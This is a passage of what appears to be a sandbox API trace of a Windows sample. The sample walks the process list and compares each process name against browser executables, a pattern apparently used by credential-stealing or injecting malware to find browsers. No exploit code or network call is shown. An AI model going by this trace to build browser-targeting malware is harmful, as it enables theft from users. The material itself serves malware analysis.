hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.676] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.676] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.676] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.676] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.676] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.676] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.676] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0249.676] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0249.676] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0249.676] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0249.676] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.676] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0249.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0249.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0249.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0249.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.677] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.677] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0249.677] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0249.677] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0249.677] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0249.677] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.678] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.678] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.678] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.678] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.678] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.678] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.678] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0249.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0249.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0249.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0249.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0249.679] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.679] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0249.679] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0249.679] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0249.679] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0249.679] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0249.679] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.679] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0249.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0249.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0249.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0249.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0249.680] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.680] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0249.680] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0249.680] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0249.680] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0249.680] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0249.680] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.680] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0249.681] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0249.681] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0249.681] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0249.681] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0249.681] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.681] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0249.681] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0249.681] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0249.682] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0249.682] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0249.682] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.682] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0249.682] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0249.682] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0249.682] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0249.682] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0249.682] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.682] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0249.683] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0249.683] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0249.683] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0249.683] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0249.683] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.683] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0249.683] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0249.683] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0249.683] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0249.683] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0249.683] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.683] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0249.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0249.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0249.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0249.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0249.684] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.684] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0249.684] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0249.684] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0249.684] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0249.684] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0249.684] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.684] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0249.685] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0249.685] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0249.685] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0249.685] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0249.685] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.685] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0249.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0249.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0249.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0249.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0249.686] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.686] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0249.686] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0249.686] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0249.686] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0249.686] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0249.686] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.686] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0249.687] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0249.687] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0249.687] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0249.687] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0249.687] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.687] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0249.687] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0249.687] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0249.687] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0249.687] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0249.687] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.688] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0249.688] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0249.688] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0249.688] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0249.688] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0249.688] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.688] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0249.689] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0249.689] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0249.689] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0249.689] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0249.689] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.689] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0249.689] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0249.689] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0249.689] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0249.689] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0249.689] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.689] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0249.690] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0249.690] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0249.690] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0249.690] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0249.690] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.690] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0249.690] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0249.690] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0249.690] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0249.690] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0249.690] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.690] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0249.691] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0249.691] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0249.691] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0249.691] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0249.691] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.691] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.691] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0249.691] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0249.692] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0249.692] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0249.692] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.692] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.692] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.692] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.692] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.692] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.692] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.692] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0249.693] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0249.693] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0249.693] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0249.693] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0249.693] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.693] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.693] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.693] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.693] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.693] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0249.693] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.693] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.694] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0249.694] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0249.694] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0249.694] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0249.694] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.694] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.694] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.694] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.694] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.694] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0249.694] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.695] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0249.695] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0249.695] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0249.695] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0249.695] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0249.695] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.695] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.696] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0249.696] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0249.696] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0249.696] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0249.696] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.696] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.696] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.696] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.696] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.696] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0249.696] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.696] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, 